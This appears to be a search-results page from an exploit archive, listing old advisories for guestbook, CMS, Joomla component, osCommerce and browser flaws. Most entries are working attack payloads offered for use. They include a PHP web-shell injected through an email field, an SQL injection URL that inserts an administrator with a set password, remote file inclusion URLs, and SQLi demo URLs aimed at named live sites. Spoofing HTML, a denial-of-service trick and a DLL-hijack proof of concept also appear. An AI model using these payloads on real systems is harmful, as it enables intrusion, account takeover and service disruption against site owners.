Search result for 'yahoo'

Dj7xpl/HIOX GUEST BOOK (HGB) 4.0 Remote Code Execution Vulnerability ( php)

+========================I=R=A=N============================+

                     HGB Version 4.0 

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Author :

Dj7xpl / Dj7xpl[at]Yahoo[dot]com

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Type :

Remote Code Execution Vulnerability

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Product / Vendor :

HIOX FREE Guest Book

http://www.hscripts.com/scripts/php/guestbook.php

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Bug :

[1] Open Target By Browser

[2] Insert Bad Code In Email                           E.g :   <?php passthru($_GET[cmd]);?>@yahoo.com

[3] See Bad C0de   :  http://[Target]/[Path]/gb.php     E.g   :  http://dj7xpl.ir/hgb/gb.php?cmd=dir

=========================I=R=A=N=============================

#My proud Iran will remain proud
#Sp Tnx : str0ke

# milw0rm.com [2007-04-10]


Kacper/proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability ( php)

/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- proManager <= 0.73 (Add Admin) SQL Injection Vulnerabilities
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: proManager v.0.73
- [Script site: http://sourceforge.net/projects/promanager/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx
-
!@ Friendship cannot be traded for paltry gains @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Dedicated to the person
-       without whom I could not live...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
#Exploit:

http://www.site.com/[proManager_path]/note.php?note_id=-1%20INSERT%20INTO%20users%20(id.username.password.name.email.can_add_user)%20values%20(1.Kacper.devilteam.Kacper.kacper1964@yahoo.pl.1)/*

Admin name: Kacper
Password: devilteam

# milw0rm.com [2006-08-26]


599eme Man/Opera 10.10 Status Bar Obfuscation ( multiple)

<!-- 

Opera 10.10 Status Bar Obfuscation
Author : 599eme Man
Contact : flouf@live.fr

-->
<center><h1>Opera 10.10 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : flouf@live.fr</strong><br >
_______________________________________________________________________
<br>
<br>
<br>

Click on Google (look at the status bar) and you'll be redirected to Yahoo<br><strong><h1><a onclick="javascript:OB();" href="http://www.Google.com">http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
                           <font style="font-family:arial;font-size:32px">Look Here<br>
                   | <br>
                  V

<script>

function OB() {

document.write('');
document.location='http://yahoo.com';

}

</script>

599eme Man/Google Chrome 3.0195.38 Status Bar Obfuscation ( windows)

<!--
Google Chrome 3.0195.38 Status Bar Obfuscation
Author : 599eme Man
Contact : flouf@live.fr
-->

<center><h1>Google Chrome 3.0195.38 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : flouf@live.fr</strong><br >
_______________________________________________________________________
<br>
<br>
<br>

Click 1?) and then 2?) (look at the status bar for 2?)) and you'll be redirected to Yahoo<br><strong><h1><a href="javascript:window.open(self.location);">1?) Open a new Window</a><br ><a href="http://google.com" onclick="javascript:OB();">2?) http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
                           <font style="font-family:arial;font-size:32px">Look Here<br>
                   | <br>
                  V

<script>

function OB() {

document.write('');
window.close();
window.open('http://yahoo.com');

}

</script>

LoSt.HaCkEr/osCommerce Online Merchant Remote File Inclusion ( na)

# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ]
# Date: [26-8-2010]
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Version: [v 3.0 ]
# Tested on: [Windows XP]
# CVE :
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers



osCommerce Online Merchant version 3.0 suffers from a remote file inclusion vulnerability.

LoSt.HaCkEr/4images 1.7.8 Remote File Inclusion ( na)

# Exploit Title: [4images1.7.8 Remote File Include ] 
# Date: [23-8-2010] 
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Software Link: [http://www.4homepages.de/4images/download.php] 
# Version: [v 1.7.8 ] 
# Tested on: [Windows XP] 
# CVE : 
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers





4images version 1.7.8 suffers from a remote file inclusion vulnerability.

L0rd CrusAd3r/Joomla JBounceback SQL Injection ( na)

Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jbounceback SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r,KD and to all ICW members
############################################################

Description:

Joomla com_jbounceback from ijoobi suffers from an SQL injection vulnerability.

############################################################

Vulnerability:

*SQLi Vulnerability

DEMO URL: http://demo.ijoobi.com/index.php?option=com_jbounceback&Itemid=[sqli]

------------------------------------------------------------
# 0day n0 m0re #
------------------------------------------------------------


The Joomla JBounceback component suffers from a remote SQL injection vulnerability.

L0rd CrusAd3r/Joomla Jiptracker SQL Injection ( na)

Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jiptracker SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r,KD and to all ICW members
############################################################

Description:

Joomla com_jiptracker from ijoobi suffers from an SQL injection vulnerability.

############################################################

Vulnerability:

*SQLi Vulnerability

DEMO URL: http://demo.ijoobi.com/index.php?option=com_jiptracker&Itemid=[sqli]

------------------------------------------------------------
# 0day n0 m0re #
------------------------------------------------------------


The Joomla Jiptracker component suffers from a remote SQL injection vulnerability.

L0rd CrusAd3r/Joomla JLinks SQL Injection ( na)

Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_jlinks SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r,KD and to all ICW members
############################################################

Description:

Joomla com_jlinks from ijoobi suffers from an SQL injection vulnerability.

############################################################

Vulnerability:

*SQLi Vulnerability

DEMO URL: http://demo.ijoobi.com/index.php?option=com_jlinks&Itemid=[sqli]

------------------------------------------------------------
# 0day n0 m0re #
------------------------------------------------------------


The Joomla JLinks component suffers from a remote SQL injection vulnerability.

L0rd CrusAd3r/Joomla RSGallery SQL Injection ( na)

Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla com_rsgallery SQL Injection Vulnerability
Vendor url:http://ijoobi.com
Published: 2010-06-10
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r,KD and to all ICW members
############################################################

Description:

Joomla com_jlinks from ijoobi suffers from an SQL injection vulnerability.

############################################################

Vulnerability:

*SQLi Vulnerability

DEMO URL: http://demo.ijoobi.com/index.php?option=com_rsgallery2&Itemid=[sqli]

------------------------------------------------------------
# 0day n0 m0re #
------------------------------------------------------------


The Joomla RSGallery component suffers from a remote SQL injection vulnerability.

L0rd CrusAd3r/Hotel / Resort Site Script SQL Injection ( na)



Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Hotel / Resort Site Script with OnLine Reservation System
SQLi Vulnerable
Published: 2010-06-08
Vendor url:http://www.mformula.com.br
Greetz to:Sid3^effects, aa_Numb, M4n0j and to all ICW members

############################################################

DESCRIPTION:

Internal system for total administration of the site.
Available site in the languages Portuguese, Spanish, Japanese, English, Italian, French & German.
System and reservation advanced search online/offline, Control of orders and reservations, RSS/XML feed, Optimization in search engines, SiteMap Google, Yahoo and Bing, Support Inns, Hotel and Resorts, Unlimited Gallery of Photos, Supported to any type of personalized option (Color, Size, Type, etc), Tool of relationship between services, Tool of newsletters for customers, Personalization of the layout, colors and texts of the site in agreement your mark, Reports detailed on the site

############################################################

Vulnerability:

Contains an SQLi vulnerability.

demo URL:-
http://hotel.mformula.com.br/extrapage.php?cat_id=-1'[SQLi]

############################################################
-- 
With R3gards,
L0rd CrusAd3r





Hotel / Resort Site Script with OnLine Reservation System suffers from a remote SQL injection vulnerability.

Dj7xpl/hgb-exec.txt ( na)

HIOX Guest Book (HGB) version 4.0 suffers from a remote code execution vulnerability.

Kacper/proManager073.txt ( na)

proManager versions 0.73 and below remote SQL injection exploit that makes use of note.php.

Zo0mer/frontpage.DoS.txt ( na)

Date: Sat, 17 Apr 1999 09:55:58 -0700 (PDT)
From: Spb Telecom <spbtelecom@yahoo.com>
To: packetstorm@genocide2600.com
Subject: Front Page Server BUG discovered by Zo0mer

I discovered a bug in Front Page 98 Server 1 month ago. I entered my
local host address
http://zo0mer////////////////////////////////////////// and ohhhhhhhh my
server that is under WIN98 is crushed.
I think it will be usable ???
Send me comments or ICQ: 8879901
PS. If it does not work, put more / and it crushed.

------------------------------------------------------------------------

Date: Sat, 17 Apr 1999 13:40:16 -0700 (PDT)
From: Spb Telecom <spbtelecom@yahoo.com>
To: Packet Storm Security <packetstorm@genocide2600.com>
Subject: Re: Front Page Server BUG discovered by Zo0mer

I reported it to Microsoft and they do not know, and I have already watched
it on bugtraq, so put it on your page or I crush Front Servers



Windows FrontPage 98 Server contains another simple Denial of Service attack. Exploit description included.

ALPdaemon/Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll) ( windows)

/*
# Exploit Title: Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll)
# Date: 25/08/2010
# Author: ALPdaemon
# Email: ALPdaemon (at) yahoo (dot) com
# Software Link: N/A
# Tested on: Windows XP SP3 English
# Extension: .isp
*/
#include <windows.h>

int alpdaemon()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  alpdaemon();
  return 0;
}